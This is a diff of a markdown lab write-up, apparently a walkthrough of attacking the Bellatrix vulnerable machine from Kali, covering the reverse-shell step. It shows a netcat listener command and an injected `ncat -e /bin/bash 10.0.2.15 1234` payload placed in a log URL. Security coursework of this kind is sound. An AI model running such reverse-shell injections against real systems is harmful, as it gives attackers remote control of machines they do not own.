lorenzodiaz2/Cybersecurity_Lab/home.md

 ### 5. Obtaining Reverse Shell

 Now, it’s time to take the reverse shell.
-We want to arrive at the scenario where on the Kali Machine there is a listener (a server) listening on a certain port and on the Bellatrix Machine there is a Reverse Shell.
+We want to arrive at the scenario where on the Kali Machine there is a listener (a server) listening on a certain port and on the Bellatrix Machine there is a Reverse Shell connected to Kali Machine.
 I have used Netcat as listener, a command-line utility that reads and writes data across network connections using the TCP or UDP protocols, so in the terminal of Kali Machine we execute `nc -lvp 1234` command, in which:
- - *-l* stands for ”listen”, tells *nc* to go into listen mode
+ - *-l* stands for "listen", tells *nc* to go into listen mode
  - *-v* stands for "verbose", makes *nc* more verbose showing additional connection status messages
  - *-p* specifies the port on which *nc* should listen, 1234 in this case

-After that we must execute some code on the Bellatrix Machine to open a connection with the Kali Machine on port 1234 and spawn a process that executes */bin/bash* and we do this by injecting code directly into the log URL.
+After that we have to execute some code on the Bellatrix Machine to open a connection with the Kali Machine on port 1234 and spawn a process that executes */bin/bash* and we do this by injecting code directly into the log URL.
 The code we inject is `ncat -e /bin/bash 10.0.2.15 1234`, where:
  - *ncat* is an advanced implementation of *nc* that offers many additional features
  - *-e* followed by */bin/bash* specifies to run the *bin/bash* program as a child process when a connection is established
  - 10.0.2.15 is the IP of the Kali Machine